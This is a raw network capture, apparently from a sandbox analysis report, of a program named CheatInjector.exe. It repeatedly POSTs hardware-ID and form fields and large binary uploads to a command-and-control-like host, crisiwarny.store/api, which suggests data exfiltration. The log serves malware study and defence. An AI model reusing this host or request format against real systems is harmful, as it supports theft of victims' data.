                                                              Data Ascii: Ni3KA2ZlKcBYA1xz8NNphsBDTMbVaaHQ1hWaEumo06VgellEN7y2XF/B2CO602iCkdAZQBSwPlHX0tgSqbdPvSPuTBf/MHqQ2AHMu3HXrkGAE5rWB7Y4SZUUX1Irpo8s5H+KFGZwqceLgF63MBBs0UBACtYDdagJkMbNRbv3WL007kvEdTN5EhtEmLKzli3TjkwABUfnbdha2VMT7GQf7PJ2W8J2vLZcX8HYI7rTaIKR0BlAFLA+UdfS2BKpt9Q


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.449734104.21.95.914432892C:\Users\user\Desktop\CheatInjector.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-26 05:01:12 UTC282OUTPOST /api HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                              Content-Length: 18170
                                                              Host: crisiwarny.store
                                                              2024-10-26 05:01:12 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 43 44 41 37 43 34 33 35 44 30 43 39 32 31 37 32 38 43 46 44 32 34 36 42 37 34 36 34 36 46 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 71 67 66 76 71
                                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"2CDA7C435D0C921728CFD246B74646F1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--qgfvq
                                                              2024-10-26 05:01:12 UTC2839OUTData Raw: 79 41 bb b9 8c 98 dd 7e cd 12 32 f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27
                                                              Data Ascii: yA~2MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'
                                                              2024-10-26 05:01:13 UTC1023INHTTP/1.1 200 OK
                                                              Date: Sat, 26 Oct 2024 05:01:12 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Set-Cookie: PHPSESSID=ev07b3qfi0h6c8ng7m6vpjfbjl; expires=Tue, 18 Feb 2025 22:47:51 GMT; Max-Age=9999999; path=/
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Pragma: no-cache
                                                              cf-cache-status: DYNAMIC
                                                              vary: accept-encoding
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V8RGKi0af%2BV%2FS5P23t%2BkDWgz0t93gCJ5A%2BVXemtk%2Fhq5uDvILje1dS9htN3%2FnK%2BTdHNP8jYZbTqnfsimHUvob43ihufal9fnjNL25Mk9gX7vRtqbPzSFTu45LwC1A%2Fp4s%2BJm"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8d87e317bc6704a8-CDG
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=255467&sent=12&recv=20&lost=0&retrans=0&sent_bytes=2839&recv_bytes=19132&delivery_rate=11589&cwnd=32&unsent_bytes=0&cid=8099cca0f9d1039b&ts=1018&x=0"
                                                              2024-10-26 05:01:13 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 0d 0a
                                                              Data Ascii: 11ok 173.254.250.68


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.449738104.21.95.914432892C:\Users\user\Desktop\CheatInjector.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-26 05:01:14 UTC281OUTPOST /api HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                              Content-Length: 8791
                                                              Host: crisiwarny.store
                                                              2024-10-26 05:01:14 UTC8791OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 43 44 41 37 43 34 33 35 44 30 43 39 32 31 37 32 38 43 46 44 32 34 36 42 37 34 36 34 36 46 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 71 67 66 76 71
                                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"2CDA7C435D0C921728CFD246B74646F1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--qgfvq
                                                              2024-10-26 05:01:14 UTC1006INHTTP/1.1 200 OK
                                                              Date: Sat, 26 Oct 2024 05:01:14 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Set-Cookie: PHPSESSID=hvr9u0lbbd4n3c42dj3mrkna8s; expires=Tue, 18 Feb 2025 22:47:53 GMT; Max-Age=9999999; path=/
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Pragma: no-cache
                                                              cf-cache-status: DYNAMIC
                                                              vary: accept-encoding
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xli7wm6kUcEj%2B846xdzF%2Bw2ddNzDxODNKTHQ49HzeDxLDRlvsiVkTcWwLFRLbh9MD2yK4HMRTPrpG6jNXPJaOVqkWoyVlrgoBEZ1ZPnT9lyGoEeYqXngD6o9k1lrlfV2gZzp"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8d87e324fd20b77c-AMS
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=125628&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2839&recv_bytes=9730&delivery_rate=22563&cwnd=32&unsent_bytes=0&cid=39c0c89388ee1fed&ts=628&x=0"
                                                              2024-10-26 05:01:14 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 0d 0a
                                                              Data Ascii: 11ok 173.254.250.68
                                                              2024-10-26 05:01:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              4192.168.2.449740104.21.95.914432892C:\Users\user\Desktop\CheatInjector.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-26 05:01:15 UTC282OUTPOST /api HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                              Content-Length: 20444
                                                              Host: crisiwarny.store
                                                              2024-10-26 05:01:15 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 43 44 41 37 43 34 33 35 44 30 43 39 32 31 37 32 38 43 46 44 32 34 36 42 37 34 36 34 36 46 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 71 67 66 76 71
                                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"2CDA7C435D0C921728CFD246B74646F1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--qgfvq
                                                              2024-10-26 05:01:15 UTC5113OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06
                                                              Data Ascii: `M?lrQMn 64F6(X&7~
                                                              2024-10-26 05:01:16 UTC1010INHTTP/1.1 200 OK
                                                              Date: Sat, 26 Oct 2024 05:01:16 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Set-Cookie: PHPSESSID=4mng8if4d0q8u0ps5evn80o44q; expires=Tue, 18 Feb 2025 22:47:55 GMT; Max-Age=9999999; path=/
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Pragma: no-cache
                                                              cf-cache-status: DYNAMIC
                                                              vary: accept-encoding
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pvCPCGOXecpFQzFAdolnAF2RLwq%2FNI8EieorH3uvCz9d04JQ%2B7DhZTVCyY6qYZuuKQzwxRThpaiKMk39hHFPMekFW0T4N9zY9N7tRG5l7oi9htyBGZ2%2B9IsqNaamuWbn9jBn"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8d87e32ebf935c47-AMS
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=122757&sent=11&recv=22&lost=0&retrans=0&sent_bytes=2838&recv_bytes=21406&delivery_rate=23568&cwnd=32&unsent_bytes=0&cid=3bdc34073c44c307&ts=645&x=0"
                                                              2024-10-26 05:01:16 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 0d 0a
                                                              Data Ascii: 11ok 173.254.250.68
                                                              2024-10-26 05:01:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              5192.168.2.449742104.21.95.914432892C:\Users\user\Desktop\CheatInjector.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-26 05:01:17 UTC281OUTPOST /api HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                              Content-Length: 1262
                                                              Host: crisiwarny.store
                                                              2024-10-26 05:01:17 UTC1262OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 43 44 41 37 43 34 33 35 44 30 43 39 32 31 37 32 38 43 46 44 32 34 36 42 37 34 36 34 36 46 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 71 67 66 76 71
                                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"2CDA7C435D0C921728CFD246B74646F1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--qgfvq
                                                              2024-10-26 05:01:18 UTC1007INHTTP/1.1 200 OK
                                                              Date: Sat, 26 Oct 2024 05:01:18 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Set-Cookie: PHPSESSID=e9cnfrkvrloggtnuk9edhacm9c; expires=Tue, 18 Feb 2025 22:47:56 GMT; Max-Age=9999999; path=/
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Pragma: no-cache
                                                              cf-cache-status: DYNAMIC
                                                              vary: accept-encoding
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wiqthGiUF0tk8cPIIo2IB0FIvN5sW33DIdiOEr4SXB4qNRHmP4fey5aWTFzWfWAtBzqyilONHgjYUdIFmXAD1%2FkFcblc38oGA%2FXsnuk70HxDluGSmzrkgEc2Jdl4PG%2FDBo0X"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8d87e33abb66b8fd-AMS
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=125016&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2179&delivery_rate=23350&cwnd=32&unsent_bytes=0&cid=af3e7e53772c0fce&ts=438&x=0"
                                                              2024-10-26 05:01:18 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 0d 0a
                                                              Data Ascii: 11ok 173.254.250.68
                                                              2024-10-26 05:01:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              6192.168.2.449744104.21.95.914432892C:\Users\user\Desktop\CheatInjector.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-26 05:01:19 UTC283OUTPOST /api HTTP/1.1
                                                              Connection: Keep-Alive
                                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                              Content-Length: 553526
                                                              Host: crisiwarny.store
                                                              2024-10-26 05:01:19 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 43 44 41 37 43 34 33 35 44 30 43 39 32 31 37 32 38 43 46 44 32 34 36 42 37 34 36 34 36 46 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 71 67 66 76 71
                                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"2CDA7C435D0C921728CFD246B74646F1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--qgfvq
                                                              2024-10-26 05:01:19 UTC15331OUTData Raw: e3 54 6c 4c 88 b5 f6 78 46 cd 6e b0 43 cc d6 b5 e7 69 62 a1 54 99 0b a3 b7 36 cf 0b a3 af 58 5a c6 80 04 69 94 26 b5 c7 88 99 93 a6 0a da b5 80 1f 6a ec f4 de 25 1f 7e 30 c3 b1 a1 d9 f9 72 5a 0d 64 41 07 76 53 cd 16 ee e0 62 29 5e a3 9b c9 73 05 97 27 40 73 d2 f4 d1 8a c4 7a 38 08 0a 5d 77 35 94 f4 c2 6f 5a a1 e0 09 2e ce 01 3c 90 5e 14 1b b3 87 ae b1 ff ea 91 dc 1c d1 b3 d7 be 1b ee f7 b0 28 07 62 d4 2f 16 5e 72 ef 19 0c b9 7c ef 9b 8d dd db 91 17 5c 43 65 4e ae 45 bc a3 6e 48 03 4d 7d ef cb 91 3a 27 79 0e 24 a7 ac 6e 73 f1 82 20 65 c1 31 16 3d ff 1e 78 6c 54 79 9e b9 b1 9f 2b 78 76 f5 49 29 80 dd bb b9 36 f8 53 56 8c 6d 90 76 c3 0b ca be d1 ff e0 5f 47 03 df 6c 4d f8 ae 3c 44 11 ed 11 45 04 1d 8a 39 0b e6 11 51 f2 80 c2 62 ff 35 9e e0 db de d6 ca 3e d2
                                                              Data Ascii: TlLxFnCibT6XZi&j%~0rZdAvSb)^s'@sz8]w5oZ.<^(b/^r|\CeNEnHM}:'y$ns e1=xlTy+xvI)6SVmv_GlM<DE9Qb5>
                                                              2024-10-26 05:01:19 UTC15331OUTData Raw: d4 a0 ee e6 36 06 bc a8 aa 98 ab 5f db ca cc 6d 61 a4 e1 60 71 5d 0f a6 23 2f d8 74 24 02 06 4e 14 cc 0b 83 77 48 3a a0 0b 3c 8e d1 ab 78 40 fc 31 44 e3 e3 8e 00 ed 19 04 ad fe 49 3e 0c 4a 1c 01 65 11 ef 06 81 b2 cb 64 40 fd 74 94 fe ed d7 be 9c 11 60 9e 0a ab 31 7a 6f 6b 52 73 41 5e 68 5d 06 76 5a dc 0b d5 00 5e 9c 0e 51 de 2c 00 88 fd 3b 0c 28 87 b8 80 28 87 5f 92 49 84 d2 e3 b8 1b 25 43 b9 81 4d 11 16 8d 3a bc 26 05 d2 d1 59 8f 6e 52 b1 f0 ac 80 5b d1 9d d7 a7 e4 c5 50 87 e7 d1 ed 0a d3 16 42 db 63 4d 1a ba bb 9b fa b9 9f 6f be 48 3f 1d be 55 79 92 f1 bc 75 07 e1 ef 93 ac fe 43 aa 40 ae e7 af 61 71 c4 2c e1 4d e9 99 89 82 e6 84 29 ed 59 1d 28 bd 15 c3 d7 2b 3c fa 3a a8 ad 78 f7 de 06 d1 2e d2 37 a1 95 75 e4 51 f1 b6 75 26 d1 51 36 3e 65 4f 93 c6 f0 19
                                                              Data Ascii: 6_ma`q]#/t$NwH:<x@1DI>Jed@t`1zokRsA^h]vZ^Q,;((_I%CM:&YnR[PBcMoH?UyuC@aq,M)Y(+<:x.7uQu&Q6>eO
                                                              2024-10-26 05:01:19 UTC15331OUTData Raw: 33 6f e9 d6 d4 54 1e 02 9c e6 77 97 e5 bc 1c 2f e2 63 ef 8f d3 8c aa c9 51 94 5f fe e7 50 ab a1 14 b4 d0 03 f5 53 28 ee cf 2e 53 7c 3c 9d e5 87 c3 fd d0 5a e5 ec a7 92 14 a4 ec 11 2e a0 a0 2c a8 c0 5a 75 d7 9d 92 ce dc 2a ee fb cf b4 57 cb 9e 8c d1 bc 8e 12 9a 10 dc 1e 7b da 29 d0 f2 1a 53 a4 0c 08 0b 39 22 23 10 fb 6c 74 c8 9d 42 26 96 4b 10 73 f1 12 3e 23 92 67 f6 bd 2e a5 0d 39 a7 08 d6 92 ea 0e 2c a5 de a5 2d cb 0e 1c e3 2b 8e ff 18 59 59 b1 ca 2e 33 b4 c9 ad e5 01 3f 0f f0 61 14 4e e9 e8 3c 14 48 a2 ee 8e 23 f7 56 e1 e2 60 d1 dc 3b de fb 2c 7a 82 23 a5 56 5f da 59 8f c6 f9 86 57 54 b0 f9 27 1f 90 64 1e ca 4e 86 e0 2c e8 79 67 1d f5 10 1f c5 76 9b e4 8b b2 9d e5 d3 a3 e3 b7 11 6b 67 86 c3 62 54 77 00 ee c4 9a b8 79 81 d5 a8 a7 2d 85 a2 f5 f5 be bf 48
                                                              Data Ascii: 3oTw/cQ_PS(.S|<Z.,Zu*W{)S9"#ltB&Ks>#g.9,-+YY.3?aN<H#V`;,z#V_YWT'dN,ygvkgbTwy-H
                                                              2024-10-26 05:01:19 UTC15331OUTData Raw: ee 4e ad 5b 2c e9 41 94 55 91 df ce 72 42 c6 4e de 2a db 64 b4 64 4f 3d 8a 32 53 c1 ab 3b 05 d3 6a bf 3f 3e 67 ea 9d 32 a5 3b 9b 63 b9 81 e9 2a 08 2e ca a6 99 dd 37 fd 1e 54 d4 4c 9e 9e 60 26 6a 2b c3 76 b5 f8 f4 19 5e a3 e3 33 6f 17 a8 5a 40 02 e1 fd 31 89 7a 18 50 5a f4 97 66 45 f2 1f 9d 4c b2 f2 03 f9 4b ca 9f 8c 3e 82 4e b6 4a 79 8c f9 b1 37 aa 77 d4 cf ce e0 5e ac c2 65 68 99 4f a5 77 40 76 87 c0 ef d2 c4 ad 57 a0 58 0c 59 77 e2 c6 da 87 b8 ca a5 ab 27 e3 fe bf 95 b1 e2 ff 5d 4b b7 74 01 69 77 39 3c c0 0f 57 8c 62 fd 38 67 ad 73 1a e4 af 22 da ae 63 2c d1 e0 fc a5 ac 86 ba 63 00 bb 79 e9 d3 54 ed 69 db f8 38 ca eb a5 04 db 08 05 f8 3f 44 be 26 e8 7c 14 56 cf 1a a0 0d d0 4f f0 1d e5 de 51 02 65 1d 44 5e 20 8d 58 3e be f0 96 86 a2 f0 6c 29 a1 f8 ee be
                                                              Data Ascii: N[,AUrBN*ddO=2S;j?>g2;c*.7TL`&j+v^3oZ@1zPZfELK>NJy7w^ehOw@vWXYw']Ktiw9<Wb8gs"c,cyTi8?D&|VOQeD^ X>l)
                                                              2024-10-26 05:01:19 UTC15331OUTData Raw: 28 61 1a ff b8 b9 0e 86 be b6 6e fa f0 e4 71 34 7d b2 6b ff 94 4b fd f7 bd 7c 4b 98 65 d7 8f b7 53 ca 5a 1b 11 c4 d9 cd 5c bb 4e b3 e0 60 f6 0b 8d be cd 20 f5 9c 4c 84 69 d5 ce f1 ed b7 78 41 5c b2 0a f1 1e 25 d9 92 a8 c7 a6 e3 ce f7 63 82 f2 69 a1 aa 8a 11 fe b0 4c 9f 54 1b b7 52 c8 6a 0e 80 d9 f2 e2 91 f6 52 92 95 2b ff b1 8d b6 ef 82 bc 3c cf ae 8f 64 55 6d 61 97 ee ed ad f5 5b fd 5f 8f d0 d1 52 fc d9 88 5c 84 81 3f eb 46 59 5f 05 42 78 e9 86 41 7f 03 81 67 74 bf cd 79 d2 e4 c4 46 cd cc c4 e9 32 1b 08 ef 8a 8d 4d 27 6f 97 9a 28 53 17 16 f7 c7 86 53 76 07 ad ee dc e0 c6 0e 91 6b d1 41 22 70 4a 07 ec 95 2c 56 d4 38 02 3c ff fd 5c 3e 4c 03 09 06 87 c9 5d bc 7d 66 a7 bc 98 cc 29 5a 61 f0 91 aa eb 9f 93 dc 98 b5 8d 72 c0 68 bd a7 bb 70 0e 69 59 57 a3 ff 5e
                                                              Data Ascii: (anq4}kK|KeSZ\N` LixA\%ciLTRjR+<dUma[_R\?FY_BxAgtyF2M'o(SSvkA"pJ,V8<\>L]}f)ZarhpiYW^
                                                              2024-10-26 05:01:19 UTC15331OUTData Raw: ea 52 77 a3 42 e7 b1 a7 1d eb 73 7d 6e f9 68 4a 5c 3d d9 ac f4 9e e5 a5 a4 5d 9c 1a 97 50 16 da 08 e4 08 a1 29 51 55 6b 45 07 e1 94 a8 09 07 87 9d 21 15 2b 0d 0a e9 79 fc 08 db be 2b ce 2d e2 c9 41 f8 d2 56 9d 44 b7 50 18 06 da 04 2c c0 be 5b b4 98 9f 24 17 dd 47 75 13 59 c7 c7 1b 1a 27 1e 55 cb ff 33 31 f0 04 68 a9 8b ff ff 8f 23 35 fd b6 23 4d 6b 20 82 20 ec 0c 97 79 88 04 b4 ef 54 79 18 56 7f d1 54 73 85 4d fc 53 33 cc dc 27 95 22 02 53 5a 2d b8 4b 54 03 a0 7b 2d cb 2a ac 1a 45 77 dc 74 7c 39 a0 9a b7 6a 44 4d 4f ed 60 d8 0b 99 71 99 da 55 de 7c b1 40 37 9e e8 b8 69 3f 21 a8 18 58 28 d0 1e 43 e5 17 71 22 d1 74 8f 7b 0b eb fc 25 99 87 2c 26 c1 b2 a3 0c f5 c4 b2 bb 42 4d 44 10 76 7d 39 9d 68 86 08 42 50 93 e7 b8 49 02 43 ae 67 0a 9b 93 56 34 d8 18 5e 34
